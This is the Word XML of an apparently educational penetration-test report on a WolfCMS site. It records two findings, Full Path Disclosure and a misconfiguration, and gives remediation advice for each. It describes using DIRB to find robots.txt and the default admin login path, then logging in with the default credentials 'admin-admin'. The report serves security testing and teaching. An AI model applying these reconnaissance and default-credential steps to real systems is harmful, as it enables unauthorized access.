      <w:tr w:rsidR="002C17A9" w14:paraId="18A29B72" w14:textId="77777777" w:rsidTr="00E645E6">
        <w:trPr>
          <w:trHeight w:val="1403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1975" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3528BCA4" w14:textId="26ED0A9B" w:rsidR="002C17A9" w:rsidRPr="002C17A9" w:rsidRDefault="002C17A9" w:rsidP="00EC7BA1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C17A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidRPr="002C17A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="145B1CC9" w14:textId="35D1DB8B" w:rsidR="003C1B38" w:rsidRDefault="003C1B38" w:rsidP="003C1B38">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1B38">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="007A75A0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2E74B5" w:themeColor="accent5" w:themeShade="BF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Full Path Disclosure (FPD) is a security vulnerability where an attacker can discover the internal file paths of a web application. This flaw exposes the server's file structure and configuration details, potentially providing valuable information for exploitation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76D9B285" w14:textId="7BF1B30F" w:rsidR="002C17A9" w:rsidRDefault="002C17A9" w:rsidP="003C1B38">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C17A9" w14:paraId="274E29E4" w14:textId="77777777" w:rsidTr="00E645E6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1975" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CE41984" w14:textId="77777777" w:rsidR="002C17A9" w:rsidRDefault="00E645E6" w:rsidP="00EC7BA1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Risk:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="708B7573" w14:textId="77777777" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00EC7BA1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="31321318" w14:textId="55B3DF54" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00EC7BA1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69135FC6" w14:textId="631F2FA9" w:rsidR="002C17A9" w:rsidRPr="007A75A0" w:rsidRDefault="003C1B38" w:rsidP="00EC7BA1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A75A0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B0F0"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C17A9" w14:paraId="39AEC925" w14:textId="77777777" w:rsidTr="00E645E6">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1975" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="549B7B1A" w14:textId="084EE1C4" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00EC7BA1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
            <w:r w:rsidR="007D00C3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> Used:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CA9C613" w14:textId="6BCE8609" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00EC7BA1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1820B43A" w14:textId="72D17DBA" w:rsidR="002C17A9" w:rsidRDefault="003C1B38" w:rsidP="00EC7BA1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A75A0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">DIRB </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D8FB5E7" w14:textId="7369C6BD" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00EC7BA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BFA36AC" w14:textId="4DAE29D3" w:rsidR="003C1B38" w:rsidRDefault="003C1B38" w:rsidP="00EC7BA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Discovery Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D87753F" w14:textId="2B5E8846" w:rsidR="003C1B38" w:rsidRPr="00A04133" w:rsidRDefault="00A04133" w:rsidP="00EC7BA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="833C0B" w:themeColor="accent2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A04133">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="833C0B" w:themeColor="accent2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">When I used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04133">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="833C0B" w:themeColor="accent2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04133">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="833C0B" w:themeColor="accent2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, I discovered a "robots.txt" file, and it contained a template for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04133">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="833C0B" w:themeColor="accent2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>WolfCMS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04133">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="833C0B" w:themeColor="accent2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Initially, I wasn't familiar with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A04133">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="833C0B" w:themeColor="accent2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>WolfCMS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A04133">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="833C0B" w:themeColor="accent2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, so I conducted a search on Google and found that it is a website building tool. I then visited the URL "</w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00A04133">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="833C0B" w:themeColor="accent2" w:themeShade="80"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://ip/wolfcms</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A04133">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="833C0B" w:themeColor="accent2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>," but it didn't yield any results. After further research, I learned about a default login page with the URL "</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00A04133">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="833C0B" w:themeColor="accent2" w:themeShade="80"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://ip/wolfcms/?/admin/login</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A04133">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="833C0B" w:themeColor="accent2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>." This is how I progressed in my investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359B81C5" w14:textId="69D1465F" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00EC7BA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E645E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300CBADF" w14:textId="4A8951C3" w:rsidR="003C1B38" w:rsidRDefault="003B07CE" w:rsidP="00EC7BA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B26E1E4" wp14:editId="3CC41C95">
            <wp:extent cx="6840220" cy="3756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840220" cy="3756660"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11128EE4" w14:textId="09E14811" w:rsidR="003B07CE" w:rsidRDefault="00B504B4" w:rsidP="00EC7BA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="229675F7" wp14:editId="5643A40F">
            <wp:extent cx="6840220" cy="3558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840220" cy="3558540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="020339CE" w14:textId="50CD4B48" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00EC7BA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ECDF2E1" w14:textId="6DEB9DE4" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00EC7BA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03153349" w14:textId="103C2BF6" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00EC7BA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6F35FC" w14:textId="14ED3279" w:rsidR="00ED22D5" w:rsidRPr="00ED22D5" w:rsidRDefault="00ED22D5" w:rsidP="00EC7BA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED22D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222A35" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>To mitigate FPD vulnerabilities, security professionals should disable detailed error messages and safeguard sensitive information. Regular security audits and testing help identify and address such vulnerabilities, enhancing the overall security of web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4113E158" w14:textId="32B8BD4B" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00EC7BA1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="787FFDCB" w14:textId="77777777" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24F7EEB3" w14:textId="21CC86E5" w:rsidR="00E645E6" w:rsidRDefault="00AE244F" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00E645E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0017027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0017027B" w:rsidRPr="0017027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1975"/>
        <w:gridCol w:w="8787"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E645E6" w14:paraId="57DE9EED" w14:textId="77777777" w:rsidTr="00E06298">
        <w:trPr>
          <w:trHeight w:val="1403"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1975" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="568D00C6" w14:textId="77777777" w:rsidR="00E645E6" w:rsidRPr="002C17A9" w:rsidRDefault="00E645E6" w:rsidP="00E06298">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002C17A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:r w:rsidRPr="002C17A9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A638B29" w14:textId="4EDAA77B" w:rsidR="00E645E6" w:rsidRPr="007A75A0" w:rsidRDefault="007A75A0" w:rsidP="00E06298">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A75A0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Misconfiguration is a security issue where incorrect or careless configuration is applied to system, application, or network settings. This can lead to unauthorized access, data leaks, and other security vulnerabilities. Exploiting default credentials is a common method in attacks resulting from misconfiguration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E645E6" w14:paraId="22ABE258" w14:textId="77777777" w:rsidTr="00E06298">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1975" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1283CDD5" w14:textId="77777777" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00E06298">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Risk:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="657C0EC9" w14:textId="77777777" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00E06298">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="63502DE1" w14:textId="77777777" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00E06298">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8787" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15FCEA0E" w14:textId="0760D970" w:rsidR="00E645E6" w:rsidRDefault="007A75A0" w:rsidP="00E06298">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A75A0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4170EF9E" w14:textId="27C022A4" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10FDAF71" w14:textId="5A120412" w:rsidR="0017027B" w:rsidRDefault="0017027B" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Discovery Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003319C8" w14:textId="374C1F08" w:rsidR="0017027B" w:rsidRPr="0017027B" w:rsidRDefault="0017027B" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0017027B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>When I encountered the login page and didn't know the credentials, I tried using the default credentials "admin-admin," and I was able to log in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A55D3D" w14:textId="77777777" w:rsidR="00E645E6" w:rsidRDefault="00E645E6" w:rsidP="00E645E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E645E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
